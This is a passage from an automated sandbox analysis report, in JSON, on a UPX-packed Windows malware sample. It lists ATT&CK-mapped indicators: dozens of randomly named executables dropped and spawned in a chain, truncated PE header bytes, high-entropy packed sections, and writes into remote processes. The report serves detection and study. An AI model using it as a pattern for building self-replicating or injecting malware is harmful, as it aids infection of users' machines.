4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66846.exe\" wrote 15555 bytes starting with PE header signature to file \"C:\\242220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"242220.exe\" wrote 15572 bytes starting with PE header signature to file \"C:\\nxdndh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxdndh.exe\" wrote 15592 bytes starting with PE header signature to file \"C:\\rndlb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rndlb.exe\" wrote 15610 bytes starting with PE header signature to file \"C:\\ldprbfj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldprbfj.exe\" wrote 15627 bytes starting with PE header signature to file \"C:\\trrfx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"trrfx.exe\" wrote 15647 bytes starting with PE header signature to file \"C:\\ddxvh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ddxvh.exe\" wrote 15663 bytes starting with PE header signature to file \"C:\\rhnnvfl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhnnvfl.exe\" wrote 15675 bytes starting with PE header signature to file \"C:\\njxth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"njxth.exe\" wrote 15687 bytes starting with PE header signature to file \"C:\\6400262.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6400262.exe\" wrote 15698 bytes starting with PE header signature to file \"C:\\066460.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"066460.exe\" wrote 15711 bytes starting with PE header signature to file \"C:\\0066646.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0066646.exe\" wrote 15729 bytes starting with PE header signature to file \"C:\\422022.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"422022.exe\" wrote 15746 bytes starting with PE header signature to file \"C:\\402060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"402060.exe\" wrote 15759 bytes starting with PE header signature to file \"C:\\606282.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"606282.exe\" wrote 15773 bytes starting with PE header signature to file \"C:\\nxthl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxthl.exe\" wrote 15792 bytes starting with PE header signature to file \"C:\\dptrvt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"rhnvfjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hlrxpfj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4080482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2286284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2020002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8808880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dptrvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dptrvt.exe]- [targetUID: 00000000-00002116]\n \"nxthl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxthl.exe]- [targetUID: 00000000-00002116]\n \"606282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\606282.exe]- [targetUID: 00000000-00003752]\n \"402060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\402060.exe]- [targetUID: 00000000-00004680]\n \"422022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\422022.exe]- [targetUID: 00000000-00004680]\n \"0066646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0066646.exe]- [targetUID: 00000000-00004652]\n \"066460.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\066460.exe]- [targetUID: 00000000-00001692]\n \"6400262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6400262.exe]- [targetUID: 00000000-00001712]\n \"njxth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njxth.exe]- [targetUID: 00000000-00001192]\n \"rhnnvfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhnnvfl.exe]- [targetUID: 00000000-00001192]\n \"ddxvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ddxvh.exe]- [targetUID: 00000000-00002252]\n \"trrfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trrfx.exe]- [targetUID: 00000000-00002252]\n \"ldprbfj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldprbfj.exe]- [targetUID: 00000000-00004256]\n \"rndlb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rndlb.exe]- [targetUID: 00000000-00003096]\n \"nxdndh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxdndh.exe]- [targetUID: 00000000-00003096]\n \"242220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\242220.exe]- [targetUID: 00000000-00003656]\n \"66846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66846.exe]- [targetUID: 00000000-00003656]\n \"22228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22228.exe]- [targetUID: 00000000-00002956]\n \"680060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\680060.exe]- [targetUID: 00000000-00002956]\n \"404042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\404042.exe]- [targetUID: 00000000-00000108]\n \"frftj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frftj.exe]- [targetUID: 00000000-00001852]\n \"jfpjt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jfpjt.exe]- [targetUID: 00000000-00001852]\n \"pfxjb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfxjb.exe]- [targetUID: 00000000-00002952]\n \"06460.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06460.exe]- [targetUID: 00000000-00002952]\n \"6602848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6602848.exe]- [targetUID: 00000000-00002736]\n \"6662204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6662204.exe]- [targetUID: 00000000-00002380]\n \"244640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\244640.exe]- [targetUID: 00000000-00002380]\n \"4600202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4600202.exe]- [targetUID: 00000000-00004308]\n \"684202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\684202.exe]- [targetUID: 00000000-00004308]\n \"480606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\480606.exe]- [targetUID: 00000000-00002028]\n \"jxtvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxtvd.exe]- [targetUID: 00000000-00002028]\n \"bnjttb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnjttb.exe]- [targetUID: 00000000-00000788]\n \"phlthhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phlthhl.exe]- [targetUID: 00000000-00004432]\n \"djblbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djblbb.exe]- [targetUID: 00000000-00003604]\n \"llrlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llrlf.exe]- [targetUID: 00000000-00003604]\n \"vtrrrtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtrrrtd.exe]- [targetUID: 00000000-00001080]\n \"vfvxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfvxb.exe]- [targetUID: 00000000-00001428]\n \"jjtpnvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjtpnvv.exe]- [targetUID: 00000000-00001428]\n \"04028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04028.exe]- [targetUID: 00000000-00004316]\n \"080068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\080068.exe]- [targetUID: 00000000-00003716]\n \"4442828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4442828.exe]- [targetUID: 00000000-00003716]\n \"6644682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6644682.exe]- [targetUID: 00000000-00003776]\n \"nxxhj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxxhj.exe]- [targetUID: 00000000-00001820]\n \"fjprrfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fjprrfr.exe]- [targetUID: 00000000-00001820]\n \"hhprhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hhprhp.exe]- [targetUID: 00000000-00004416]\n \"nhxhrtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhxhrtb.exe]- [targetUID: 00000000-00003364]\n \"ndnvnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndnvnh.exe]- [targetUID: 00000000-00004548]\n \"vvlhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vvlhl.exe]- [targetUID: 00000000-00004548]\n \"djhdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djhdv.exe]- [targetUID: 00000000-00002108]\n \"hbxvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbxvf.exe]- [targetUID: 00000000-00004228]\n \"264608.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\264608.exe]- [targetUID: 00000000-00003728]\n \"68804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68804.exe]- [targetUID: 00000000-00003728]\n \"vnxlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnxlf.exe]- [targetUID: 00000000-00003712]\n \"rbpjdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbpjdh.exe]- [targetUID: 00000000-00003712]\n \"nnpjtv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nnpjtv.exe]- [targetUID: 00000000-00006096]\n \"jvvbdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jvvbdv.exe]- [targetUID: 00000000-00006096]\n \"rllbfv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rllbfv.exe]- [targetUID: 00000000-00006140]\n \"ltnxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltnxl.exe]- [targetUID: 00000000-00006140]\n \"rbndhnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbndhnn.exe]- [targetUID: 00000000-00006132]\n \"2664824.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2664824.exe]- [targetUID: 00000000-00004516]\n \"8284862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8284862.exe]- [targetUID: 00000000-00006080]\n \"lxpbndn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxpbndn.exe]- [targetUID: 00000000-00005952]\n \"hvnjft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hvnjft.exe]- [targetUID: 00000000-00005936]\n \"vnxhhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnxhhp.exe]- [targetUID: 00000000-00005936]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has section name UPX1 with entropy \"7.97244478673\"\n \"rhnvfjn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hlrxpfj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4080482.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2286284.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2020002.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"06062.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8808880.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dptrvt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nxthl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"606282.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"402060.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"422022.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0066646.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"066460.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6400262.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"njxth.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rhnnvfl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ddxvh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"trrfx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ldprbfj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rndlb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nxdndh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"242220.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"66846.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has a section named \"UPX0\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has a section named \"UPX1\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has a section named \"UPX2\"\n \"rhnvfjn.exe\" has a section named \"UPX0\"\n \"rhnvfjn.exe\" has a section named \"UPX1\"\n \"rhnvfjn.exe\" has a section named \"UPX2\"\n \"hlrxpfj.exe\" has a section named \"UPX0\"\n \"hlrxpfj.exe\" has a section named \"UPX1\"\n \"hlrxpfj.exe\" has a section named \"UPX2\"\n \"4080482.exe\" has a section named \"UPX0\"\n \"4080482.exe\" has a section named \"UPX1\"\n \"4080482.exe\" has a section named \"UPX2\"\n \"2286284.exe\" has a section named \"UPX0\"\n \"2286284.exe\" has a section named \"UPX1\"\n \"2286284.exe\" has a section named \"UPX2\"\n \"2020002.exe\" has a section named \"UPX0\"\n \"2020002.exe\" has a section named \"UPX1\"\n \"2020002.exe\" has a section named \"UPX2\"\n \"06062.exe\" has a section named \"UPX0\"\n \"06062.exe\" has a section named \"UPX1\"\n \"06062.exe\" has a section named \"UPX2\"\n \"8808880.exe\" has a section named \"UPX0\"\n \"8808880.exe\" has a section named \"UPX1\"\n \"8808880.exe\" has a section named \"UPX2\"\n \"dptrvt.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (UID: 00000000-00005944)\n Spawned process \"vnxhhp.exe\" (UID: 00000000-00005936)\n Spawned process \"hvnjft.exe\" (UID: 00000000-00005952)\n Spawned process \"lxpbndn.exe\" (UID: 00000000-00004248)\n Spawned process \"8284862.exe\" (UID: 00000000-00006080)\n Spawned process \"2664824.exe\" (UID: 00000000-00004516)\n Spawned process \"rbndhnn.exe\" (UID: 00000000-00006132)\n Spawned process \"ltnxl.exe\" (UID: 00000000-00006140)\n Spawned process \"rllbfv.exe\" (UID: 00000000-00005416)\n Spawned process \"jvvbdv.exe\" (UID: 00000000-00006096)\n Spawned process \"nnpjtv.exe\" (UID: 00000000-00003892)\n Spawned process \"rbpjdh.exe\" (UID: 00000000-00003712)\n Spawned process \"vnxlf.exe\" (UID: 00000000-00003852)\n Spawned process \"68804.exe\" (UID: 00000000-00003728)\n Spawned process \"264608.exe\" (UID: 00000000-00004228)\n Spawned process \"hbxvf.exe\" (UID: 00000000-00002108)\n Spawned process \"djhdv.exe\" (UID: 00000000-00003784)\n Spawned process \"vvlhl.exe\" (UID: 00000000-00004548)\n Spawned process \"ndnvnh.exe\" (UID: 00000000-00003840)\n Spawned process \"nhxhrtb.exe\" (UID: 00000000-00003364)\n Spawned process \"hhprhp.exe\" (UID: 00000000-00004416)\n Spawned process \"fjprrfr.exe\" (UID: 00000000-00001820)\n Spawned process \"nxxhj.exe\" (UID: 00000000-00003776)\n Spawned process \"6644682.exe\" (UID: 00000000-00004584)\n Spawned process \"4442828.exe\" (UID: 00000000-00003716)\n Spawned process \"080068.exe\" (UID: 00000000-00004316)\n Spawned process \"04028.exe\" (UID: 00000000-00002064)\n Spawned process \"jjtpnvv.exe\" (UID: 00000000-00001428)\n Spawned process \"vfvxb.exe\" (UID: 00000000-00001080)\n Spawned process \"vtrrrtd.exe\" (UID: 00000000-00003368)\n Spawned process \"llrlf.exe\" (UID: 00000000-00003604)\n Spawned process \"djblbb.exe\" (UID: 00000000-00004432)\n Spawned process \"phlthhl.exe\" (UID: 00000000-00002816)\n Spawned process \"bnjttb.exe\" (UID: 00000000-00000788)\n Spawned process \"jxtvd.exe\" (UID: 00000000-00002028)\n Spawned process \"480606.exe\" (UID: 00000000-00003484)\n Spawned process \"684202.exe\" (UID: 00000000-00004308)\n Spawned process \"4600202.exe\" (UID: 00000000-00001948)\n Spawned process \"244640.exe\" (UID: 00000000-00002380)\n Spawned process \"6662204.exe\" (UID: 00000000-00002860)\n Spawned process \"6602848.exe\" (UID: 00000000-00002736)\n Spawned process \"06460.exe\" (UID: 00000000-00002952)\n Spawned process \"pfxjb.exe\" (UID: 00000000-00001096)\n Spawned process \"jfpjt.exe\" (UID: 00000000-00001852)\n Spawned process \"frftj.exe\" (UID: 00000000-00000108)\n Spawned process \"404042.exe\" (UID: 00000000-00000276)\n Spawned process \"680060.exe\" (UID: 00000000-00002956)\n Spawned process \"22228.exe\" (UID: 00000000-00001856)\n Spawned process \"66846.exe\" (UID: 00000000-00003656)\n Spawned process \"242220.exe\" (UID: 00000000-00002584)\n Spawned process \"nxdndh.exe\" (UID: 00000000-00003096)\n Spawned process \"rndlb.exe\" (UID: 00000000-00004256)\n Spawned process \"ldprbfj.exe\" (UID: 00000000-00001212)\n Spawned process \"trrfx.exe\" (UID: 00000000-00002252)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" wrote 32 bytes to a remote process \"C:\\vnxhhp.exe\" (Handle: 116)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" wrote 52 bytes to a remote process \"C:\\vnxhhp.exe\" (Handle: 116)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" wrote 4 bytes to a remote process \"C:\\vnxhhp.exe\" (Handle: 116)\n \"vnxhhp.exe\" wrote 32 bytes to a remote process \"C:\\hvnjft.exe\" (Handle: 68)\n \"vnxhhp.exe\" wrote 52 bytes to a remote process \"C:\\hvnjft.exe\" (Handle: 68)\n \"vnxhhp.exe\" wrote 4 bytes to a remote process \"C:\\hvnjft.exe\" (Handle: 68)\n \"hvnjft.exe\" wrote 32 bytes to a remote process \"C:\\lxpbndn.exe\" (Handle: 68)\n \"hvnjft.exe\" wrote 52 bytes to a remote process \"C:\\lxpbndn.exe\" (Handle: 68)\n \"hvnjft.exe\" wrote 4 bytes to a remote process \"C:\\lxpbndn.exe\" (Handle: 68)\n \"lxpbndn.exe\" wrote 32 bytes to a remote process \"C:\\8284862.exe\" (Handle: 120)\n \"lxpbndn.exe\" wrote 52 bytes to a remote process \"C:\\8284862.exe\" (Handle: 120)\n \"lxpbndn.exe\" wrote 4 bytes to a remote process \"C:\\8284862.exe\" (Handle: 120)\n \"8284862.exe\" wrote 32 bytes to a remote process \"C:\\2664824.exe\" (Handle: 68)\n \"8284862.exe\" wrote 52 bytes to a remote process \"C:\\2664824.exe\" (Handle: 68)\n \"8284862.exe\" wrote 4 bytes to a remote process \"C:\\2664824.exe\" (Handle: 68)\n \"2664824.exe\" wrote 32 bytes to a remote process \"C:\\rbndhnn.exe\" (Handle: 64)\n \"2664824.exe\" wrote 52 bytes to a remote process \"C:\\rbndhnn.exe\" (Handle: 64)\n \"2664824.exe\" wrote 4 bytes to a remote process \"C:\\rbndhnn.exe\" (Handle: 64)\n \"rbndhnn.exe\" wrote 32 bytes to a remote process \"C:\\ltnxl.exe\" (Handle: 68)\n \"rbndhnn.exe\" wrote 52 bytes to a remote process \"C:\\ltnxl.exe\" (Handle: 68)\n \"rbndhnn.exe\" wrote 4 bytes to a remote process \"C:\\ltnxl.exe\" (Handle: 68)\n \"ltnxl.exe\" wrote 32 bytes to a remote process \"C:\\rllbfv.exe\" (Handle: 116)\n \"ltnxl.exe\" wrote 52 bytes to a remote process \"C:\\rllbfv.exe\" (Handle: 116)\n \"ltnxl.exe\" wrote 4 bytes to a remote process \"C:\\rllbfv.exe\" (Handle: 116)\n \"rllbfv.exe\" wrote 32 bytes to a remote process \"C:\\jvvbdv.exe\" (Handle: 68)\n \"rllbfv.exe\" wrote 52 bytes to a remote process \"C:\\jvvbdv.exe\" (Handle: 68)\n \"rllbfv.exe\" wrote 4 bytes to a remote process \"C:\\jvvbdv.exe\" (Handle: 68)\n \"jvvbdv.exe\" wrote 32 bytes to a remote process \"C:\\nnpjtv.exe\" (Handle: 116)\n \"jvvbdv.exe\" wrote 52 bytes to a remote process \"C:\\nnpjtv.exe\" (Handle: 116)\n \"jvvbdv.exe\" wrote 4 bytes to a remote process \"C:\\nnpjtv.exe\" (Handle: 116)\n \"nnpjtv.exe\" wrote 32 bytes to a remote process \"C:\\rbpjdh.exe\" (Handle: 72)\n \"nnpjtv.exe\" wrote 52 bytes to a remote process \"C:\\rbpjdh.exe\" (Handle: 72)\n \"nnpjtv.exe\" wrote 4 bytes to a remote process \"C:\\rbpjdh.exe\" (Handle: 72)\n \"rbpjdh.exe\" wrote 32 bytes to a remote process \"C:\\vnxlf.exe\" (Handle: 68)\n \"rbpjdh.exe\" wrote 52 bytes to a remote process \"C:\\vnxlf.exe\" (Handle: 68)\n \"rbpjdh.exe\" wrote 4 bytes to a remote process \"C:\\vnxlf.exe\" (Handle: 68)\n \"vnxlf.exe\" wrote 32 bytes to a remote process \"C:\\68804.exe\" (Handle: 116)\n \"vnxlf.exe\" wrote 52 bytes to a remote 